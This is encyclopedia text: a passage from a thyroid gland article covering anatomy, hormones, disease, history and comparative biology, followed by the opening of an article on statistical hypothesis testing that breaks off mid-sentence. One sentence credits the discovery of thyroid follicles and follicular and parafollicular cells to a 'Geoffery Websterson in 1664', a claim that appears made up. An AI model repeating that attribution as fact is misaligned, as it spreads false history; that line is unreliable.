lobe. When present, this lobe often stretches up to the hyoid bone from the thyroid isthmus and may be one to several divided lobes. The presence of this lobe ranges in reported studies from 18.3% to 44.6%. It was shown to more often arise from the left side and occasionally separated. The pyramidal lobe is also known as Lalouette's pyramid. The pyramidal lobe is a remnant of the thyroglossal duct, which usually wastes away during the thyroid gland's descent. Small accessory thyroid glands may in fact occur anywhere along the thyroglossal duct, from the foramen cecum of the tongue to the position of the thyroid in the adult. A small horn at the back of the thyroid lobes, usually close to the recurrent laryngeal nerve and the inferior thyroid artery, is called Zuckerkandl's tubercle. Other variants include a levator muscle of thyroid gland, connecting the isthmus to the body of the hyoid bone, and the presence of the small thyroid ima artery. Microanatomy At the microscopic level, there are three primary features of the thyroid—thyroid follicles, thyroid follicular cells, and parafollicular cells, first discovered by Geoffery Websterson in 1664. Follicles Thyroid follicles are small spherical groupings of cells 0.02–0.9mm in diameter that play the main role in thyroid function. They consist of a rim that has a rich blood supply, nerve and lymphatic presence, that surrounds a core of colloid that consists mostly of thyroid hormone precursor proteins called thyroglobulin, an iodinated glycoprotein. Follicular cells The core of a follicle is surrounded by a single layer of follicular cells. When stimulated by thyroid stimulating hormone (TSH), these secrete the thyroid hormones T3 and T4. They do this by transporting and metabolising the thyroglobulin contained in the colloid. Follicular cells vary in shape from flat to cuboid to columnar, depending on how active they are. Follicular lumen The follicular lumen is the fluid-filled space within a follicle of the thyroid gland. There are hundreds of follicles within the thyroid gland. A follicle is formed by a spherical arrangement of follicular cells. The follicular lumen is filled with colloid, a concentrated solution of thyroglobulin and is the site of synthesis of the thyroid hormones thyroxine (T4) and triiodothyronine (T3). Parafollicular cells Scattered among follicular cells and in spaces between the spherical follicles are another type of thyroid cell, parafollicular cells. These cells secrete calcitonin and so are also called C cells. Development In the development of the embryo, at 3–4 weeks gestational age, the thyroid gland appears as an epithelial proliferation in the floor of the pharynx at the base of the tongue between the tuberculum impar and the copula linguae. The copula soon becomes covered over by the hypopharyngeal eminence at a point later indicated by the foramen cecum. The thyroid then descends in front of the pharyngeal gut as a bilobed diverticulum through the thyroglossal duct. Over the next few weeks, it migrates to the base of the neck, passing in front of the hyoid bone. During migration, the thyroid remains connected to the tongue by a narrow canal, the thyroglossal duct. At the end of the fifth week the thyroglossal duct degenerates, and over the following two weeks the detached thyroid migrates to its final position. The fetal hypothalamus and pituitary start to secrete thyrotropin-releasing hormone (TRH) and thyroid-stimulating hormone (TSH). TSH is first measurable at 11 weeks. By 18–20 weeks, the production of thyroxine (T4) reaches a clinically significant and self-sufficient level. Fetal triiodothyronine (T3) remains low, less than 15 ng/dL until 30 weeks, and increases to 50 ng/dL at full-term. The fetus needs to be self-sufficient in thyroid hormones in order to guard against neurodevelopmental disorders that would arise from maternal hypothyroidism. The presence of sufficient iodine is essential for healthy neurodevelopment. The neuroendocrine parafollicular cells, also known as C cells, responsible for the production of calcitonin, are derived from foregut endoderm. This part of the thyroid then first forms as the ultimopharyngeal body, which begins in the ventral fourth pharyngeal pouch and joins the primordial thyroid gland during its descent to its final location. Aberrations in prenatal development can result in various forms of thyroid dysgenesis which can cause congenital hypothyroidism, and if untreated this can lead to cretinism. Function Thyroid hormones The primary function of the thyroid is the production of the iodine-containing thyroid hormones, triiodothyronine (T3) and thyroxine or tetraiodothyronine (T4) and the peptide hormone calcitonin. The thyroid hormones are created from iodine and tyrosine. T3 is so named because it contains three atoms of iodine per molecule and T4 contains four atoms of iodine per molecule. The thyroid hormones have a wide range of effects on the human body. These include: Metabolic. The thyroid hormones increase the basal metabolic rate and have effects on almost all body tissues. Appetite, the absorption of substances, and gut motility are all influenced by thyroid hormones. They increase the absorption in the gut, generation, uptake by cells, and breakdown of glucose. They stimulate the breakdown of fats, and increase the number of free fatty acids. Despite increasing free fatty acids, thyroid hormones decrease cholesterol levels, perhaps by increasing the rate of secretion of cholesterol in bile. Cardiovascular. The hormones increase the rate and strength of the heartbeat. They increase the rate of breathing, intake and consumption of oxygen, and increase the activity of mitochondria. Combined, these factors increase blood flow and the body's temperature. Developmental. Thyroid hormones are important for normal development. They increase the growth rate of young people, and cells of the developing brain are a major target for the thyroid hormones T3 and T4. Thyroid hormones play a particularly crucial role in brain maturation during fetal development and first few years of postnatal life The thyroid hormones also play a role in maintaining normal sexual function, sleep, and thought patterns. Increased levels are associated with increased speed of thought generation but decreased focus. Sexual function, including libido and the maintenance of a normal menstrual cycle, are influenced by thyroid hormones. After secretion, only a very small proportion of the thyroid hormones travel freely in the blood. Most are bound to thyroxine-binding globulin (about 70%), transthyretin (10%), and albumin (15%). Only the 0.03% of T4 and 0.3% of T3 traveling freely have hormonal activity. In addition, up to 85% of the T3 in blood is produced following conversion from T4 by iodothyronine deiodinases in organs around the body. Thyroid hormones act by crossing the cell membrane and binding to intracellular nuclear thyroid hormone receptors TR-α1, TR-α2, TR-β1, and TR-β2, which bind with hormone response elements and transcription factors to modulate DNA transcription. In addition to these actions on DNA, the thyroid hormones also act within the cell membrane or within cytoplasm via reactions with enzymes, including calcium ATPase, adenylyl cyclase, and glucose transporters. Hormone production The thyroid hormones are created from thyroglobulin. This is a protein within the colloid in the follicular lumen that is originally created within the rough endoplasmic reticulum of follicular cells and then transported into the follicular lumen. Thyroglobulin contains 123 units of tyrosine, which reacts with iodine within the follicular lumen. Iodine is essential for the production of the thyroid hormones. Iodine (I0) travels in the blood as iodide (I−), which is taken up into the follicular cells by a sodium-iodide symporter. This is an ion channel on the cell membrane which in the same action transports two sodium ions and an iodide ion into the cell. Iodide then travels from within the cell into the lumen, through the action of pendrin, an iodide-chloride antiporter. In the follicular lumen, the iodide is then oxidized to iodine. This makes it more reactive, and the iodine is attached to the active tyrosine units in thyroglobulin by the enzyme thyroid peroxidase. This forms the precursors of thyroid hormones monoiodotyrosine (MIT), and diiodotyrosine (DIT). When the follicular cells are stimulated by thyroid-stimulating hormone, the follicular cells reabsorb thyroglobulin from the follicular lumen. The iodinated tyrosines are cleaved, forming the thyroid hormones T4, T3, DIT, MIT, and traces of reverse triiodothyronine. T3 and T4 are released into the blood. The hormones secreted from the gland are about 80–90% T4 and about 10–20% T3. Deiodinase enzymes in peripheral tissues remove the iodine from MIT and DIT and convert T4 to T3 and RT3. This is a major source of both RT3 (95%) and T3 (87%) in peripheral tissues. Regulation The production of thyroxine and triiodothyronine is primarily regulated by thyroid-stimulating hormone (TSH), released by the anterior pituitary gland. TSH release in turn is stimulated by thyrotropin releasing hormone (TRH), released in a pulsatile manner from the hypothalamus. The thyroid hormones provide negative feedback to the thyrotropes TSH and TRH: when the thyroid hormones are high, TSH production is suppressed. This negative feedback also occurs when levels of TSH are high, causing TRH production to be suppressed. TRH is secreted at an increased rate in situations such as cold exposure in order to stimulate thermogenesis. In addition to being suppressed by the presence of thyroid hormones, TSH production is blunted by dopamine, somatostatin, and glucocorticoids. Calcitonin The thyroid gland also produces the hormone calcitonin, which helps regulate blood calcium levels. Parafollicular cells produce calcitonin in response to high blood calcium. Calcitonin decreases the release of calcium from bone, by decreasing the activity of osteoclasts, cells which break down bone. Bone is constantly reabsorbed by osteoclasts and created by osteoblasts, so calcitonin effectively stimulates movement of calcium into bone. The effects of calcitonin are opposite those of the parathyroid hormone (PTH) produced in the parathyroid glands. However, calcitonin seems far less essential than PTH, since calcium metabolism remains clinically normal after removal of the thyroid (thyroidectomy), but not the parathyroid glands. Gene and protein expression About 20,000 protein-coding genes are expressed in human cells: 70% of these genes are expressed in thyroid cells. Two-hundred and fifty of these genes are more specifically expressed in the thyroid, and about 20 genes are highly thyroid specific. In the follicular cells, the proteins synthesized by these genes direct thyroid hormone synthesis—thyroglobulin, TPO, and IYD; while in the parafollicular c-cells, they direct calcitonin synthesis—CALCA, and CALCB. Clinical significance General practitioners, and internal medicine specialists play a role in identifying and monitoring the treatment of thyroid disease. Endocrinologists and thyroidologists are thyroid specialists. Thyroid surgeons or otolaryngologists are responsible for the surgical management of thyroid disease. Functional disorders Hyperthyroidism Excessive production of the thyroid hormones is called hyperthyroidism. Causes include Graves' disease, toxic multinodular goitre, solitary thyroid adenoma, inflammation, and a pituitary adenoma which secretes excess TSH. Another cause is excess iodine availability, either from excess ingestion, induced by the drug amiodarone, or following iodinated contrast imaging. Hyperthyroidism often causes a variety of non-specific symptoms including weight loss, increased appetite, insomnia, decreased tolerance of heat, tremor, palpitations, anxiety and nervousness. In some cases it can cause chest pain, diarrhoea, hair loss and muscle weakness. Such symptoms may be managed temporarily with drugs such as beta blockers. Long-term management of hyperthyroidism may include drugs that suppress thyroid function such as propylthiouracil, carbimazole and methimazole. Alternatively, radioactive iodine-131 can be used to destroy thyroid tissue: radioactive iodine is selectively taken up by thyroid cells, which over time destroys them. The chosen first-line treatment will depend on the individual and on the country where being treated. Surgery to remove the thyroid can sometimes be performed as a transoral thyroidectomy, a minimally invasive procedure. Surgery does however carry a risk of damage to the parathyroid glands and the recurrent laryngeal nerve, which innervates the vocal cords. If the entire thyroid gland is removed, hypothyroidism will inevitably result, and thyroid hormone substitutes will be needed. Hypothyroidism An underactive thyroid gland results in hypothyroidism. Typical symptoms are abnormal weight gain, tiredness, constipation, heavy menstrual bleeding, hair loss, cold intolerance, and a slow heart rate. Iodine deficiency is the most common cause of hypothyroidism worldwide, and the autoimmune disease Hashimoto's thyroiditis is the most common cause in the developed world. Other causes include congenital abnormalities, diseases causing transient inflammation, surgical removal or radioablation of the thyroid, the drugs amiodarone and lithium, amyloidosis, and sarcoidosis. Some forms of hypothyroidism can result in myxedema and severe cases can result in myxedema coma. Hypothyroidism is managed with replacement of the thyroid hormones. This is usually given daily as an oral supplement, and may take a few weeks to become effective. Some causes of hypothyroidism, such as Postpartum thyroiditis and Subacute thyroiditis may be transient and pass over time, and other causes such as iodine deficiency may be able to be rectified with dietary supplementation. Diseases Graves' disease Graves' disease is an autoimmune disorder that is the most common cause of hyperthyroidism. In Graves' disease, for an unknown reason autoantibodies develop against the thyroid stimulating hormone receptor. These antibodies activate the receptor, leading to development of a goitre and symptoms of hyperthyroidism, such as heat intolerance, weight loss, diarrhoea and palpitations. Occasionally such antibodies block but do not activate the receptor, leading to symptoms associated with hypothyroidism. In addition, gradual protrusion of the eyes may occur, called Graves' ophthalmopathy, as may swelling of the front of the shins. Graves' disease can be diagnosed by the presence of pathomnomonic features such as involvement of the eyes and shins, or isolation of autoantibodies, or by results of a radiolabelled uptake scan. Graves' disease is treated with anti-thyroid drugs such as propylthiouracil, which decrease the production of thyroid hormones, but hold a high rate of relapse. If there is no involvement of the eyes, then use of radioactive isotopes to ablate the gland may be considered. Surgical removal of the gland with subsequent thyroid hormone replacement may be considered, however this will not control symptoms associated with the eye or skin. Nodules Thyroid nodules are often found on the gland, with a prevalence of 4–7%. The majority of nodules do not cause any symptoms, thyroid hormone secretion is normal, and they are non-cancerous. Non-cancerous cases include simple cysts, colloid nodules, and thyroid adenomas. Malignant nodules, which only occur in about 5% of nodules, include follicular, papillary, medullary carcinomas and metastasis from other sites Nodules are more likely in females, those who are exposed to radiation, and in those who are iodine deficient. When a nodule is present, thyroid function tests determine whether the nodule is secreting excess thyroid hormones, causing hyperthyroidism. When the thyroid function tests are normal, an ultrasound is often used to investigate the nodule, and provide information such as whether the nodule is fluid-filled or a solid mass, and whether the appearance is suggestive of a benign or malignant cancer. A needle aspiration biopsy may then be performed, and the sample undergoes cytology, in which the appearance of cells is viewed to determine whether they resemble normal or cancerous cells. The presence of multiple nodules is called a multinodular goitre; and if it is associated with hyperthyroidism, it is called a toxic multinodular goitre. Goitre An enlarged thyroid gland is called a goitre. Goitres are present in some form in about 5% of people, and are the result of a large number of causes, including iodine deficiency, autoimmune disease (both Graves' disease and Hashimoto's thyroiditis), infection, inflammation, and infiltrative disease such as sarcoidosis and amyloidosis. Sometimes no cause can be found, a state called "simple goitre". Some forms of goitre are associated with pain, whereas many do not cause any symptoms. Enlarged goitres may extend beyond the normal position of the thyroid gland to below the sternum, around the airway or esophagus. Goitres may be associated with hyperthyroidism or hypothyroidism, relating to the underlying cause of the goitre. Thyroid function tests may be done to investigate the cause and effects of the goitre. The underlying cause of the goitre may be treated, however many goitres with no associated symptoms are simply monitored. Inflammation Inflammation of the thyroid is called thyroiditis, and may cause symptoms of hyperthyroidism or hypothyroidism. Two types of thyroiditis initially present with hyperthyroidism and are sometimes followed by a period of hypothyroidism – Hashimoto's thyroiditis and postpartum thyroiditis. There are other disorders that cause inflammation of the thyroid, and these include subacute thyroiditis, acute thyroiditis, silent thyroiditis, Riedel's thyroiditis and traumatic injury, including palpation thyroiditis. Hashimoto's thyroiditis is an autoimmune disorder in which the thyroid gland is infiltrated by the lymphocytes B cell and T cells. These progressively destroy the thyroid gland. In this way, Hasimoto's thyroiditis may have occurred insidiously, and only be noticed when thyroid hormone production decreases, causing symptoms of hypothyroidism. Hashimoto's is more common in females than males, much more common after the age of 60, and has known genetic risk factors. Also more common in individuals with Hashimoto's thyroiditis are Type 1 diabetes, pernicious anaemia, Addison's disease vitiligo. Postpartum thyroiditis occurs sometimes following childbirth. After delivery, the thyroid becomes inflamed and the condition initially presents with a period of hyperthyroidism followed by hypothyroidism and, usually, a return to normal function. The course of the illness takes place over several months, and is characterised by a painless goitre. Antibodies against thyroid peroxidase can be found on testing. The inflammation usually resolves without treatment, although thyroid hormone replacement may be needed during the period of hypothyroidism. Cancer The most common tumor affecting the thyroid is a benign adenoma, usually presenting as a painless mass in the neck. Thyroid cancers are most often carcinomas, although cancer can occur in any tissue that the thyroid consists of, including cancer of C-cells and lymphomas. Cancers from other sites also rarely lodge in the thyroid. Radiation of the head and neck presents a risk factor for thyroid cancer, and cancer is more common in women than men, occurring at a rate of about 2:1. In most cases, thyroid cancer presents as a painless mass in the neck. It is very unusual for thyroid cancers to present with other symptoms, although in some cases cancer may cause hyperthyroidism. Most thyroid cancers are papillary, followed by follicular, medullary, and thyroid lymphoma. Because of the prominence of the thyroid gland, cancer is often detected earlier in the course of disease as the cause of a nodule, which may undergo fine-needle aspiration. Thyroid function tests will help reveal whether the nodule produces excess thyroid hormones. A radioactive iodine uptake test can help reveal the activity and location of the cancer and metastases. Thyroid cancers are treated by removing the whole or part of thyroid gland. Radioactive Iodine-131 may be given to radioablate the thyroid. Thyroxine is given to replace the hormones lost and to suppress TSH production, as TSH may stimulate recurrence. With the exception of the rare anaplastic thyroid cancer, which carries a very poor prognosis, most thyroid cancers carry an excellent prognosis and can even be considered curable. Congenital A persistent thyroglossal duct is the most common clinically significant birth defect of the thyroid gland. A persistent sinus tract may remain as a vestigial remnant of the tubular development of the thyroid gland. Parts of this tube may be obliterated, leaving small segments to form thyroglossal cysts. Preterm neonates are at risk of hypothyroidism as their thyroid glands are insufficiently developed to meet their postnatal needs. In order to detect hypothyroidism in newborn babies, to prevent growth and development abnormalities in later life, many countries have newborn screening programs at birth. Infants with thyroid hormone deficiency (congenital hypothyroidism) can manifest problems of physical growth and development as well as brain development, termed cretinism. Children with congenital hypothyroidism are treated supplementally with levothyroxine, which facilitates normal growth and development. Mucinous, clear secretions may collect within these cysts to form either spherical masses or fusiform swellings, rarely larger than 2 to 3 cm in diameter. These are present in the midline of the neck anterior to the trachea. Segments of the duct and cysts that occur high in the neck are lined by stratified squamous epithelium, which is essentially identical to that covering the posterior portion of the tongue in the region of the foramen cecum. The disorders that occur in the lower neck more proximal to the thyroid gland are lined by epithelium resembling the thyroidal acinar epithelium. Characteristically, next to the lining epithelium, there is an intense lymphocytic infiltrate. Superimposed infection may convert these lesions into abscess cavities, and rarely, give rise to cancers. Another disorder is that of thyroid dysgenesis which can result in various presentations of one or more misplaced accessory thyroid glands. These can be asymptomatic. Iodine Iodine deficiency, most common in inland and mountainous areas, can predispose to goitre – if widespread, known as endemic goitre. Pregnant women deficient of iodine can give birth to infants with thyroid hormone deficiency. The use of iodised salt to add iodine to the diet has eliminated endemic cretinism in most developed countries, and over 120 countries have made the iodination of salt mandatory. Because the thyroid concentrates iodine, it also concentrates the various radioactive isotopes of iodine produced by nuclear fission. In the event of large accidental releases of such material into the environment, the uptake of radioactive iodine isotopes by the thyroid can, in theory, be blocked by saturating the uptake mechanism with a large surplus of non-radioactive iodine, taken in the form of potassium iodide tablets. One consequence of the Chernobyl disaster was an increase in thyroid cancers in children in the years following the accident. Excessive iodine intake is uncommon and usually has no effect on the thyroid function. Sometimes though it may cause hyperthyroidism, and sometimes hypothyroidism with a resulting goitre. Evaluation The thyroid is examined by observation of the gland and surrounding neck for swelling or enlargement. It is then felt, usually from behind, and a person is often asked to swallow to better feel the gland against the fingers of the examiner. The gland moves up and down with swallowing because of its attachments to the thyroid and cricoid cartilages. In a healthy person the gland is not visible yet is palpable as a soft mass. Examination of the thyroid gland includes the search for abnormal masses and the assessment of overall thyroid size. The character of the thyroid, swellings, nodules, and their consistency may all be able to be felt. If a goitre is present, an examiner may also feel down the neck consider tapping the upper part of the chest to check for extension. Further tests may include raising the arms (Pemberton's sign), listening to the gland with a stethoscope for bruits, testing of reflexes, and palpation of the lymph nodes in the head and neck. An examination of the thyroid will also include observation of the person as a whole, to look for systemic signs such as weight gain or loss, hair loss, and signs in other locations – such as protrusion of the eyes or swelling of the calves in Graves' disease. Tests Thyroid function tests include a battery of blood tests, including the measurement of the thyroid hormones, as well as the measurement of thyroid stimulating hormone (TSH). They may reveal hyperthyroidism (high T3 and T4), hypothyroidism (low T3, T4), or subclinical hyperthyroidism (normal T3 and T4 with a low TSH). TSH levels are considered the most sensitive marker of thyroid dysfunction. They are however not always accurate, particularly if the cause of hypothyroidism is thought to be related to insufficient thyrotropin releasing hormone (TRH) secretion, in which case it may be low or falsely normal. In such a case a TRH stimulation test, in which TRH is given and TSH levels are measured at 30 and 60-minutes after, may be conducted. T3 and T4 can be measured directly. However, as the two thyroid hormones travel bound to other molecules, and it is the "free" component that is biologically active, free T3 and free T4 levels can be measured. T3 is preferred, because in hypothyroidism T3 levels may be normal. The ratio of bound to unbound thyroid hormones is known as the thyroid hormone binding ratio (THBR). It is also possible to measure directly the main carriers of the thyroid hormones, thyroglobulin and throxine-binding globulin. Thyroglobulin will also be measurable in a healthy thyroid, and will increase with inflammation, and may also be used to measure the success of thyroid removal or ablation. If successful, thyroglobulin should be undetectable. Lastly, antibodies against components of the thyroid, particularly anti-TPO and anti-thyroglobulin, can be measured. These may be present in normal individuals but are highly sensitive for autoimmune-related disease. Imaging Ultrasound of the thyroid may be used to reveal whether structures are solid or filled with fluid, helping to differentiate between nodules and goitres and cysts. It may also help differentiate between malignant and benign lesions. When further imaging is required, a radiolabelled iodine-123 or technetium-99 uptake scan may take place. This can determine the size and shape of lesions, reveal whether nodules or goitres are metabolically active, and reveal and monitor sites of thyroid disease or cancer deposits outside the thyroid. A fine needle aspiration of a sample of thyroid tissue may be taken in order to evaluate a lesion seen on ultrasound which is then sent for histopathology and cytology. Computed tomography of the thyroid plays an important role in the evaluation of thyroid cancer. CT scans often incidentally find thyroid abnormalities, and thereby practically becomes the first investigation modality. History The thyroid gland received its modern name in the 1600s, when the anatomist Thomas Wharton likened its shape to that of an Ancient Greek shield or . However, the existence of the gland, and of the diseases associated with it, was known long before then. Antiquity The presence and diseases of the thyroid have been noted and treated for thousands of years. In 1600 BCE burnt sponge and seaweed (which contain iodine) were used within China for the treatment of goitres, a practice which has developed in many parts of the world. In Ayurvedic medicine, the book Sushruta Samhita written about 1400 BCE described hyperthyroidism, hypothyroidism and goitre. Aristotle and Xenophon in the fifth century BCE describe cases of diffuse toxic goitre. Hippocrates and Plato in the fourth century BCE provided some of the first descriptions of the gland itself, proposing its function as a salivary gland. Pliny the Elder in the first century BCE referred to epidemics of goitre in the Alps and proposed treatment with burnt seaweed, a practice also referred to by Galen in the second century, referred to burnt sponge for the treatment of goitre. The Chinese pharmacology text Shennong Ben Cao Jing, written ca. 200–250, also refers to goitre. Scientific era In 1500 polymath Leonardo da Vinci provided the first illustration of the thyroid. In 1543 anatomist Andreas Vesalius gave the first anatomic description and illustration of the gland. In 1656 the thyroid received its modern name, by the anatomist Thomas Wharton. The gland was named thyroid, meaning shield, as its shape resembled the shields commonly used in Ancient Greece. The English name thyroid gland is derived from the medical Latin used by Wharton – . means 'gland' in Latin, and can be traced back to the Ancient Greek word , meaning 'shield-like/shield-shaped'. French chemist Bernard Courtois discovered iodine in 1811, and in 1896 Eugen Baumann documented it as the central ingredient in the thyroid gland. He did this by boiling the thyroid glands of a thousand sheep, and named the precipitate, a combination of the thyroid hormones, 'iodothyrin'. David Marine in 1907 proved that iodine is necessary for thyroid function. Graves' disease was described by Robert James Graves in 1834. The role of the thyroid gland in metabolism was demonstrated in 1895 by Adolf Magnus-Levy. Thyroxine was first isolated in 1914 and synthesized in 1927, and triiodothyroxine in 1952. The conversion of T4 to T3 was discovered in 1970. The process of discovering TSH took place over the early to mid twentieth century. TRH was discovered by Polish endocrinologist Andrew Schally in 1970, contributing in part to his Nobel Prize in Medicine in 1977. In the nineteenth century numerous authors described both cretinism and myxedema, and their relationship to the thyroid. Charles Mayo coined the term hyperthyroidism in 1910. Hakaru Hashimoto documented a case of Hashimoto's thyroiditis in 1912, antibodies in this disease were demonstrated in 1956. Knowledge of the thyroid and its conditions developed throughout the late nineteenth and twentieth centuries, with many modern treatments and investigative modalities evolving throughout the mid twentieth century, including the use of radioactive iodine, thiouracil and fine needle aspiration. Surgery Either Aetius in the sixth century CE or Persian Ali ibn Abbas al-Magusi in 990 CE conducted the first recorded thyroidectomy as a treatment for goitre. Operations remained risky and generally were not successful until the 19th century, when descriptions emerged from a number of authors including Prussian surgeon Theodor Billroth, Swiss surgeon and physiologist Theodor Kocher, American physician Charles Mayo, American surgeons William Halsted and George Crile. These descriptions provided the basis for modern thyroid surgery. Theodor Kocher went on to win the Nobel Prize in Physiology or Medicine in 1909 "for his work on the physiology, pathology and surgery of the thyroid gland". Other animals The thyroid gland is found in all vertebrates. In fish, it is usually located below the gills and is not always divided into distinct lobes. However, in some teleosts, patches of thyroid tissue are found elsewhere in the body, associated with the kidneys, spleen, heart, or eyes. In tetrapods, the thyroid is always found somewhere in the neck region. In most tetrapod species, there are two paired thyroid glands – that is, the right and left lobes are not joined. However, there is only ever a single thyroid gland in most mammals, and the shape found in humans is common to many other species. In larval lampreys, the thyroid originates as an exocrine gland, secreting its hormones into the gut, and associated with the larva's filter-feeding apparatus. In the adult lamprey, the gland separates from the gut, and becomes endocrine, but this path of development may reflect the evolutionary origin of the thyroid. For instance, the closest living relatives of vertebrates, the tunicates and amphioxi (lancelets), have a structure very similar to that of larval lampreys (the endostyle), and this also secretes iodine-containing compounds, though not thyroxine. Thyroxine is critical to metabolic regulation, and growth throughout the vertebrate clade. Iodine and T4 trigger the change from a plant-eating water-dwelling tadpole into a meat-eating land-dwelling frog, with better neurological, visuospatial, smell and cognitive abilities for hunting, as seen in other predatory animals. A similar phenomenon happens in the neotenic amphibian salamanders, which, without introducing iodine, do not transform into land-dwelling adults, and live and reproduce in the larval form of aquatic axolotl. Among amphibians, administering a thyroid-blocking agent such as propylthiouracil (PTU) can prevent tadpoles from metamorphosing into frogs; in contrast, administering thyroxine will trigger metamorphosis. In amphibian metamorphosis, thyroxine and iodine also exert a well-studied experimental model of apoptosis on the cells of gills, tail, and fins of tadpoles. Iodine, via iodolipids, has favored the evolution of terrestrial animal species and has likely played a crucial role in the evolution of the human brain.
Biology and health sciences
Animal: General
null
30284
https://en.wikipedia.org/wiki/Statistical%20hypothesis%20test
Statistical hypothesis test
A statistical hypothesis test is a method of statistical inference used to decide whether the data sufficiently supports a particular hypothesis. A statistical hypothesis test typically involves a calculation of a test statistic. Then a decision is made, either by comparing the test statistic to a critical value or equivalently by evaluating a p-value computed from the test statistic. Roughly 100 specialized statistical tests have been defined. History While hypothesis testing was popularized early in the 20th century, early forms were used in the 1700s. The first use is credited to John Arbuthnot (1710), followed by Pierre-Simon Laplace (1770s), in analyzing the human sex ratio at birth; see . Choice of null hypothesis Paul Meehl has argued that the epistemological importance of the choice of null hypothesis has gone largely unacknowledged. When the null hypothesis is predicted by theory, a more precise experiment will be a more severe test of the underlying theory. When the null hypothesis defaults to "no difference" or "no effect", a more precise experiment is a less severe test of the theory that motivated performing the experiment. An examination of the origins of the latter practice may therefore be useful: 1778: Pierre Laplace compares the birthrates of boys and girls in multiple European cities. He states: "it is natural to conclude that these possibilities are very nearly in the same ratio". Thus, the null hypothesis in this case that the birthrates of boys and girls should be equal given "conventional wisdom". 1900: Karl Pearson develops the chi squared test to determine "whether a given form of frequency curve will effectively describe the samples drawn from a given population." Thus the null hypothesis is that a population is described by some distribution predicted by theory. He uses as an example the numbers of five and sixes in the Weldon dice throw data. 1904: Karl Pearson develops the concept of "contingency" in order to determine whether outcomes are independent of a given categorical factor. Here the null hypothesis is by default that two things are unrelated (e.g. scar formation and death rates from smallpox). The null hypothesis in this case is no longer predicted by theory or conventional wisdom, but is instead the principle of indifference that led Fisher and others to dismiss the use of "inverse probabilities". Modern origins and early controversy Modern significance testing is largely the product of Karl Pearson (p-value, Pearson's chi-squared test), William Sealy Gosset (Student's t-distribution), and Ronald Fisher ("null hypothesis", analysis of variance, "significance test"), while hypothesis testing was developed by Jerzy Neyman and Egon Pearson (son of Karl). Ronald Fisher began his life in statistics as a Bayesian (Zabell 1992), but Fisher soon grew disenchanted with the subjectivity involved (namely use of the principle of indifference when determining prior probabilities), and sought to provide a more "objective" approach to inductive inference. Fisher emphasized rigorous experimental design and methods to extract a result from few samples assuming Gaussian distributions. Neyman (who teamed with the younger Pearson) emphasized mathematical rigor and methods to obtain more results from many samples and a wider range of distributions. Modern hypothesis testing is an inconsistent hybrid of the Fisher vs Neyman/Pearson formulation, methods and terminology developed in the early 20th century. Fisher popularized the "significance test". He required a null-hypothesis (corresponding to a population frequency distribution) and a sample. His (now familiar) calculations determined whether to reject the null-hypothesis or not. Significance testing did not utilize an alternative hypothesis so there was no concept of a Type II error (false negative). The p-value was devised as an informal, but objective, index meant to help a researcher determine (based on other knowledge) whether to modify future experiments or strengthen one's faith in the null hypothesis. Hypothesis testing (and Type I/II errors) was devised by Neyman and Pearson as a more objective alternative to Fisher's p-value, also meant to determine researcher behaviour, but without requiring any inductive inference by the researcher. Neyman & Pearson considered a different problem to Fisher (which they called "hypothesis testing"). They initially considered two simple hypotheses (both with frequency distributions). They calculated two probabilities and typically selected the hypothesis associated with the higher probability (the hypothesis more likely to have generated the sample). Their method always selected a hypothesis. It also allowed the calculation of both types of error probabilities. Fisher and Neyman/Pearson clashed bitterly. Neyman/Pearson considered their formulation to be an improved generalization of significance testing (the defining paper was abstract; Mathematicians have generalized and refined the theory for decades). Fisher thought that it was not applicable to scientific research because often, during the course of the experiment, it is discovered that the initial assumptions about the null hypothesis are questionable due to unexpected sources of error. He believed that the use of rigid reject/accept decisions based on models formulated before data is collected was incompatible with this common scenario faced by scientists and attempts to apply this method to scientific research would lead to mass confusion. The dispute between Fisher and Neyman–Pearson was waged on philosophical grounds, characterized by a philosopher as a dispute over the proper role of models in statistical inference. Events intervened: Neyman accepted a position in the University of California, Berkeley in 1938, breaking his partnership with Pearson and separating the disputants (who had occupied the same building). World War II provided an intermission in the debate. The dispute between Fisher and Neyman terminated (unresolved after 27 years) with Fisher's death in 1962. Neyman wrote a well-regarded eulogy. Some of Neyman's later publications reported p-values and significance levels. The modern version of hypothesis testing is a hybrid of the two approaches that resulted from confusion by writers of statistical textbooks (as predicted by Fisher) beginning in the 1940s (but signal detection, for example, still uses the Neyman/Pearson formulation). Great conceptual differences and many caveats in addition to those mentioned above were ignored. Neyman and Pearson provided the stronger terminology, the more rigorous mathematics and the more consistent philosophy, but the subject taught today in introductory statistics has more similarities with Fisher's method than theirs. Sometime around 1940, authors of statistical text books began combining the two approaches by using the p-value in place of the test statistic (or data) to test against the Neyman–Pearson "significance level". Philosophy Hypothesis testing and philosophy intersect. Inferential statistics, which includes hypothesis testing, is applied probability. Both probability and its application are intertwined with philosophy. Philosopher David Hume wrote, "All knowledge degenerates into probability." Competing practical definitions of probability reflect philosophical differences. The most common application of hypothesis testing is in the scientific interpretation of experimental data, which is naturally studied by the philosophy of science. Fisher and Neyman opposed the subjectivity of probability. Their views contributed to the objective definitions. The core of their historical disagreement was philosophical. Many of the philosophical criticisms of hypothesis testing are discussed by statisticians in other contexts, particularly correlation does not imply causation and the design of experiments. Hypothesis testing is of continuing interest to philosophers. Education Statistics is increasingly being taught in schools with hypothesis testing being one of the elements taught. Many conclusions reported in the popular press (political opinion polls to medical studies) are based on statistics. Some writers have stated that statistical analysis of this kind allows for thinking clearly about problems involving mass data, as well as the effective reporting of trends and inferences from said data, but caution that writers for a broad public should have a solid understanding of the field in order to use the terms and concepts correctly. An introductory college statistics class places much emphasis on hypothesis testing – perhaps half of the course. Such fields as literature and divinity now include findings based on statistical analysis (see the Bible Analyzer). An introductory statistics class teaches hypothesis testing as a cookbook process. Hypothesis testing is also taught at the postgraduate level. Statisticians learn how to create good statistical test procedures (like z, Student's t, F and chi-squared). Statistical hypothesis testing is considered a mature area within statistics, but a limited amount of development continues. An academic study states that the cookbook method of teaching introductory statistics leaves no time for history, philosophy or controversy. Hypothesis testing has been taught as received unified method. Surveys showed that graduates of the class were filled with philosophical misconceptions (on all aspects of statistical inference) that persisted among instructors. While the problem was addressed more than a decade ago, and calls for educational reform continue, students still graduate from statistics classes holding fundamental misconceptions about hypothesis testing. Ideas for improving the teaching of hypothesis testing include encouraging students to search for statistical errors in published papers, teaching the history of statistics and emphasizing the controversy in a generally dry subject. Performing a frequentist hypothesis test in practice The typical steps involved in performing a frequentist hypothesis test in practice are: Define a hypothesis (claim which is testable using data). Select a relevant statistical test with associated test statistic T. Derive the distribution of the test statistic under the null hypothesis from the assumptions. In standard cases this will be a well-known result. For example, the test statistic might follow a 